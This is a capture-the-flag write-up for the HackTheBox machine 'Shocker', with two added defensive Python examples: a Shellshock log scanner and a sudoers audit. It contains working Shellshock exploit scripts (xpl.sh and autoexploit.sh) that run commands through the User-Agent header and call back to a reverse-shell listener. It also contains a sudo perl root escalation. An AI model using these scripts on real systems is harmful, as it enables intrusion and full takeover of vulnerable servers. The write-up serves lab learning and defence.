Shocker

Difficulty : Easy
Operating System : Linux
Rating : 4.7
Author : mrb3n
Description
To compromise this machine we will abuse a widely known vulnerability in the "user own" stage; afterwards we will take advantage of a sudo misconfiguration to escalate to the root user.
Enumeration
For the basic enumeration we will use a tool I developed specifically for working with machines on the HackTheBox platform. It creates the working directory, runs a basic nmap scan and, if it finds a web service, launches a basic enumeration against it.
Download: HTBenum
Nmap
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Whatweb
http://shocker.htb [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.56]
HTTP Headers
HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 11:54:12 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Fri, 22 Sep 2017 20:01:19 GMT
ETag: "89-559ccac257884"
Accept-Ranges: bytes
Content-Length: 137
Vary: Accept-Encoding
Content-Type: text/html
ffuf
[root@htb shocker]# ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://shocker.htb/FUZZ/
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://shocker.htb/FUZZ/
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
cgi-bin [Status: 403, Size: 294, Words: 22, Lines: 12]
icons [Status: 403, Size: 292, Words: 22, Lines: 12]
server-status [Status: 403, Size: 300, Words: 22, Lines: 12]
:: Progress: [220545/220545] :: Job [1/1] :: 569 req/sec :: Duration: [0:06:31] :: Errors: 0 ::
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.56
+ Target Hostname: shocker.htb
+ Target Port: 80
+ Start Time: 2021-09-28 14:43:01 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8777 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2021-09-28 14:52:09 (GMT2) (548 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
User Own
In the reconnaissance phase we discovered a directory called "cgi-bin"; from this, together with the hint in the machine's name, I can guess that we are facing the ShellShock vulnerability. With that in mind, and since the directory does not list the files it contains, I will run ffuf again looking for the ".sh" and ".cgi" extensions.
ffuf
[root@htb shocker]# ffuf -e '.sh','.cgi' -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://shocker.htb/cgi-bin/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://shocker.htb/cgi-bin/FUZZ
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .sh .cgi
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
user.sh [Status: 200, Size: 119, Words: 19, Lines: 8]
It looks like there is a bash script that simply shows the machine's uptime
[root@htb shocker]# curl -s http://shocker.htb/cgi-bin/user.sh
Content-Type: text/plain
Just an uptime test script
10:24:21 up 22 min, 0 users, load average: 0.00, 0.00, 0.00
Now let's check whether it is vulnerable to ShellShock
[root@htb shocker]# curl -H "User-agent: () { :;}; echo; echo vulnerable" http://shocker.htb/cgi-bin/user.sh
vulnerable
Content-Type: text/plain
Just an uptime test script
10:30:34 up 28 min, 0 users, load average: 0.00, 0.00, 0.00
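The probe above works because the CGI handler exports the User-Agent value into the environment of a vulnerable bash, which parses the leading "() {" as a function definition and runs what follows. From the defender's side, that same prefix is the signature to look for in web server logs. The following Python scanner is an added example, not code from this writeup: it parses Apache combined-format access log lines (which record the Referer and User-Agent fields) and flags any entry whose header values carry the Shellshock function-definition prefix. The log lines are constructed for the example; the third one mirrors the probe header used above.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Apache "combined" log format:
#   host ident user [time] "request" status size "referer" "user-agent"
# Quoted fields may contain \" escapes, so each is matched as (?:[^"\\]|\\.)*
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Shellshock payloads (CVE-2014-6271 and its follow-ups) begin with a bash function
# definition exported through an environment variable: "() {" with optional
# whitespace. Matching only that prefix keeps the rule independent of the body.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


@dataclass
class Finding:
    line_no: int
    host: str
    field: str      # which header carried the payload
    request: str    # the request line, e.g. "GET /cgi-bin/user.sh HTTP/1.1"
    value: str      # the offending header value


def is_shellshock_payload(value: str) -> bool:
    """True if a header value starts a bash function definition."""
    return SHELLSHOCK_RE.search(value) is not None


def scan_access_log(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per logged header value that carries the signature."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, start=1):
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not combined format; a real deployment would count these
        for field in ("referer", "agent"):
            value = m.group(field)
            if is_shellshock_payload(value):
                findings.append(Finding(n, m.group("host"), field, m.group("request"), value))
    return findings


# Constructed sample log lines (not taken from the writeup's target).
SAMPLE_LOG = [
    '10.10.14.9 - - [28/Sep/2021:11:54:12 +0000] "GET / HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.10.14.9 - - [28/Sep/2021:12:01:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 119 "-" "curl/7.74.0"',
    '10.10.14.9 - - [28/Sep/2021:12:03:40 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 130 "-" "() { :;}; echo; echo vulnerable"',
    '10.10.14.9 - - [28/Sep/2021:12:05:11 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 130 "() { :; }; /bin/bash -c id" "curl/7.74.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.host} {f.request} -> {f.field}: {f.value!r}")
```

The scanner only sees headers that the log format records; if the attacker places the payload in a header Apache does not log (Cookie, Referer on a non-combined format, or a custom header), a web application firewall or a network sensor matching the same prefix on the wire is the place to detect it. The lasting fix is a patched bash, which refuses to import function definitions from arbitrary environment variables.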
Next we will create a small exploit to move around the operating system and send ourselves a reverse shell if needed
xpl.sh
#!/usr/bin/env bash
# Runs one command through the vulnerable CGI script and prints its output
TARGET="http://shocker.htb/cgi-bin/user.sh"
COMMAND="$1"
curl -H "User-agent: () { :;}; echo; echo; /bin/bash -c '${COMMAND}'" "${TARGET}"
[root@htb shocker]# ./xpl.sh "ls -alR /home"
/home:
total 12
drwxr-xr-x 3 root root 4096 Sep 22 2017 .
drwxr-xr-x 23 root root 4096 Sep 22 2017 ..
drwxr-xr-x 4 shelly shelly 4096 Sep 22 2017 shelly
/home/shelly:
total 36
drwxr-xr-x 4 shelly shelly 4096 Sep 22 2017 .
drwxr-xr-x 3 root root 4096 Sep 22 2017 ..
-rw------- 1 root root 0 Sep 25 2017 .bash_history
-rw-r--r-- 1 shelly shelly 220 Sep 22 2017 .bash_logout
-rw-r--r-- 1 shelly shelly 3771 Sep 22 2017 .bashrc
drwx------ 2 shelly shelly 4096 Sep 22 2017 .cache
drwxrwxr-x 2 shelly shelly 4096 Sep 22 2017 .nano
-rw-r--r-- 1 shelly shelly 655 Sep 22 2017 .profile
-rw-r--r-- 1 root root 66 Sep 22 2017 .selected_editor
-rw-r--r-- 1 shelly shelly 0 Sep 22 2017 .sudo_as_admin_successful
-r--r--r-- 1 root root 33 Sep 29 10:02 user.txt
/home/shelly/.cache:
total 8
drwx------ 2 shelly shelly 4096 Sep 22 2017 .
drwxr-xr-x 4 shelly shelly 4096 Sep 22 2017 ..
-rw-r--r-- 1 shelly shelly 0 Sep 22 2017 motd.legal-displayed
/home/shelly/.nano:
total 8
drwxrwxr-x 2 shelly shelly 4096 Sep 22 2017 .
drwxr-xr-x 4 shelly shelly 4096 Sep 22 2017 ..
Root Own
Once we have gained access to the system and after a basic enumeration, we can see a misconfiguration in sudoers
shelly@Shocker:/home/shelly$ sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
We can take advantage of our sudo rights on perl to launch a shell as root. A basic resource to check for misconfigured binaries is GTFOBins
shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
sudo /usr/bin/perl -e 'exec "/bin/sh";'
id
uid=0(root) gid=0(root) groups=0(root)
ls /root
root.txt
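The sudoers entry is dangerous because perl, like any interpreter, editor or pager, can exec a shell, so a rule that lets a user run it as root is equivalent to granting root outright. The following Python audit is an added example and not part of this writeup: it parses the text printed by `sudo -l`, splits each rule into run-as user, tags and commands, and reports any root rule whose command is an interpreter or other shell-capable binary (a small illustrative list; GTFOBins is the fuller reference). The sample input is the `sudo -l` output shown above.

```python
import os
import re
from dataclasses import dataclass
from typing import List

# Illustrative subset of binaries that can hand the caller a shell when run as root.
# Extend from GTFOBins for a real audit.
SHELL_CAPABLE = {
    "perl", "python", "python2", "python3", "ruby", "php", "node", "lua",
    "bash", "sh", "dash", "zsh", "vi", "vim", "nano", "less", "more", "man",
    "awk", "gawk", "find", "env", "tar", "zip",
}

# One rule line as printed by `sudo -l`:
#   (runas[ : group]) [TAG: TAG: ...] /path/cmd [args][, /path/cmd2 ...]
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<commands>.+)$")


@dataclass
class SudoRule:
    runas_user: str
    tags: List[str]
    command: str


@dataclass
class Finding:
    rule: SudoRule
    reason: str


def parse_sudo_l(output: str) -> List[SudoRule]:
    """Extract the per-command rules listed after the 'may run the following commands' line."""
    rules: List[SudoRule] = []
    in_rules = False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults entries and other non-rule lines
        # "(root : root)" -> "root"; an empty run-as defaults to root in sudoers
        runas_user = m.group("runas").split(":")[0].strip() or "root"
        tags = re.findall(r"[A-Z_]+", m.group("tags"))
        for cmd in m.group("commands").split(","):
            if cmd.strip():
                rules.append(SudoRule(runas_user, tags, cmd.strip()))
    return rules


def audit(rules: List[SudoRule]) -> List[Finding]:
    """Flag root rules whose command is ALL or a shell-capable binary."""
    findings: List[Finding] = []
    for r in rules:
        if r.runas_user not in ("root", "ALL"):
            continue
        if r.command == "ALL":
            findings.append(Finding(r, "unrestricted root command set"))
            continue
        prog = os.path.basename(r.command.split()[0])
        if prog in SHELL_CAPABLE:
            how = "without a password" if "NOPASSWD" in r.tags else "with the user's own password"
            findings.append(Finding(r, f"{prog} can exec a shell as root {how}"))
    return findings


# The `sudo -l` output from this writeup, used as the sample input.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
"""

if __name__ == "__main__":
    for f in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[!] ({f.rule.runas_user}) {' '.join(f.rule.tags)} {f.rule.command}: {f.reason}")
```

The audit deliberately does not look at arguments: a rule such as `/usr/bin/perl /opt/script.pl` is still flagged, because sudoers argument matching is easy to get wrong and the interpreter itself is the risk. The mitigation is to grant a dedicated, root-owned, non-writable wrapper script instead of the interpreter, or to drop the rule entirely if nothing needs it.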
EXTRA : Since this is an extra-easy machine, I put together a small bash script that plays with screen and automates the whole exploitation, retrieving the flags
autoexploit.sh
#!/usr/bin/env bash
# shocker htb automate exploit
SESSION=$(tr -dc '0-9' < /dev/urandom | fold -w 5 | head -n 1)
RSHELL="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"
screen -S ${SESSION} -dm bash -c "nc -lvvp 7788"
timeout 0.5 curl -H "User-agent: () { :;}; echo; echo; /bin/bash -c 'echo ${RSHELL} | base64 -d -w 0 > /tmp/rshell.pl'" http://shocker.htb/cgi-bin/user.sh
timeout 0.5 curl -H "User-agent: () { :;}; echo; echo; /bin/bash -c 'perl /tmp/rshell.pl 10.10.14.9 7788'" http://shocker.htb/cgi-bin/user.sh
screen -S ${SESSION} -X stuff "/bin/rm /tmp/rshell.pl"`echo -ne '\015'`
#user flag
screen -S ${SESSION} -X stuff "id"`echo -ne '\015'`
screen -S ${SESSION} -X stuff "cat /home/shelly/user.txt"`echo -ne '\015'`
#root flag
screen -S ${SESSION} -X stuff "sudo /usr/bin/perl -e 'exec \"/bin/sh\";'"`echo -ne '\015'`
screen -S ${SESSION} -X stuff "id"`echo -ne '\015'`
screen -S ${SESSION} -X stuff "cat /root/root.txt"`echo -ne '\015'`
#go to target
screen -r ${SESSION}
[root@htb shocker]# ./autoexploit.sh
listening on [any] 7788 ...
connect to [10.10.14.9] from shocker.htb [10.10.10.56] 53410
/bin/rm /tmp/rshell.pl
id
cat /home/shelly/user.txt
sudo /usr/bin/perl -e 'exec "/bin/sh";'
id
cat /root/root.txt
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
c1b46d3ccXXX395bfc0d33e3a61177cb
uid=0(root) gid=0(root) groups=0(root)
18e8d330ae3XXXecac4792348dbc8d7e